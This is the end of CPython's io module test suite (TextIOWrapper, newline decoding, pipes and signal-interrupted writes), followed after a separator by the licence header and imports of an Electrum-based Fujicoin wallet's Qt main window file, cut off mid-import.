self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() when the encoder's encode() returns an
# invalid value shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() when the decoder's getstate() returns an
# invalid value should neither crash the interpreter nor raise a
# SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
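# array.frombytes() requires the byte length to be a multiple of the
# array's itemsize, so drop any trailing remainder before building the view.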
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
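# With translate=True, a lone '\r' is held back until the next byte shows
# whether it starts a '\r\n' pair, hence the empty results below.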
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode creates a new file and opens it for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed just below.  Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
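# Chain two alarms: the first interrupts the initial raw write and re-arms the timer;
# the second interrupts again (EINTR) and starts the reader thread that drains the
# pipe so the retried writes can eventually complete.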
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Fujicoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
